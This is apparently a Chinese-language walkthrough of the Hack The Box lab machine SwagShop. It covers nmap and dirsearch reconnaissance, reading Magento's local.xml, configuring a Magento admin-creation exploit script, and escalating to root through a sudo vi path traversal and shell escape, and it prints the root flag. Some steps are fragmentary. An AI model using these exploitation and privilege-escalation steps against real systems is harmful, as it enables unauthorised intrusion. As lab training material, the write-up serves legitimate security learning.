┌──(kali㉿kali)-[~/桌面] └─$ sudo nmap -sC -sV -p- --min-rate 500 10.10.10.140 [sudo] kali 的密码: Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-07 15:01 CST Nmap scan report for 10.10.10.140 Host is up (0.30s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA) | 256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA) |_ 256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Did not follow redirect to http://swagshop.htb/ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 155.28 seconds
3、写入本地hosts文件
1 2 3
┌──(kali㉿kali)-[~/桌面] └─$ echo"10.10.10.140 swagshop.htb" | sudo tee -a /etc/hosts 10.10.10.140 swagshop.htb
┌──(kali㉿kali)-[~/桌面] └─$ dirsearch -u http://swagshop.htb/ /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html from pkg_resources import DistributionNotFound, VersionConflict
┌──(kali㉿kali)-[~/桌面] └─$ curl -s 10.10.10.140/app/etc/local.xml | grep date <date><![CDATA[Wed, 08 May 2019 07:23:09 +0000]]></date>
# Config. username = 'ypwq' password = '123' php_function = 'system'# Note: we can only pass 1 argument to the function install_date = 'Wed, 08 May 2019 07:23:09 +0000'# This needs to be the exact date from /app/etc/local.xml
┌──(kali㉿kali)-[~/桌面] └─$ python2 37811.py 'http://10.10.10.140/index.php/admin'"uname -a" Traceback (most recent call last): File "37811.py", line 55, in <module> br['login[username]'] = username File "/home/kali/.local/lib/python2.7/site-packages/mechanize/_mechanize.py", line 809, in __setitem__ self.form[name] = val File "/home/kali/.local/lib/python2.7/site-packages/mechanize/_form_controls.py", line 1963, in __setitem__ control = self.find_control(name) File "/home/kali/.local/lib/python2.7/site-packages/mechanize/_form_controls.py", line 2355, in find_control return self._find_control(name, type, kind, id, label, predicate, nr) File "/home/kali/.local/lib/python2.7/site-packages/mechanize/_form_controls.py", line 2446, in _find_control description) mechanize._form_controls.AmbiguityError: more than one control matching name 'login[username]'
www-data@swagshop:/var/www/html$ sudo -l sudo -l Matching Defaults entries for www-data on swagshop: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on swagshop: (root) NOPASSWD: /usr/bin/vi /var/www/html/* www-data@swagshop:/var/www/html$ sudo /usr/bin/vi /var/www/html/../../../root/root.txt <do /usr/bin/vi /var/www/html/../../../root/root.txt
E558: Terminal entry not found in terminfo 'unknown' not known. Available builtin terminals are: builtin_amiga builtin_beos-ansi builtin_ansi builtin_pcansi builtin_win32 builtin_vt320 builtin_vt52 builtin_xterm builtin_iris-ansi builtin_debug builtin_dumb defaulting to 'ansi' ^[:qf77f5ee41637342aac0ceb4ca809 ~ ~ ~ www-data@swagshop:/var/www/html$
E558: Terminal entry not found in terminfo 'unknown' not known. Available builtin terminals are: builtin_amiga builtin_beos-ansi builtin_ansi builtin_pcansi builtin_win32 builtin_vt320 builtin_vt52 builtin_xterm builtin_iris-ansi builtin_debug builtin_dumb defaulting to 'ansi' :shell shell=/bin/sh ~ ~ ~ :shell # id id uid=0(root) gid=0(root) groups=0(root) # cd /roo/root.txt cd /roo/root.txt /bin/sh: 2: cd: can't cd to /roo/root.txt # cat /root/root.txt cat /root/root.txt 00edf77f5ee41637342aac0ceb4ca809 #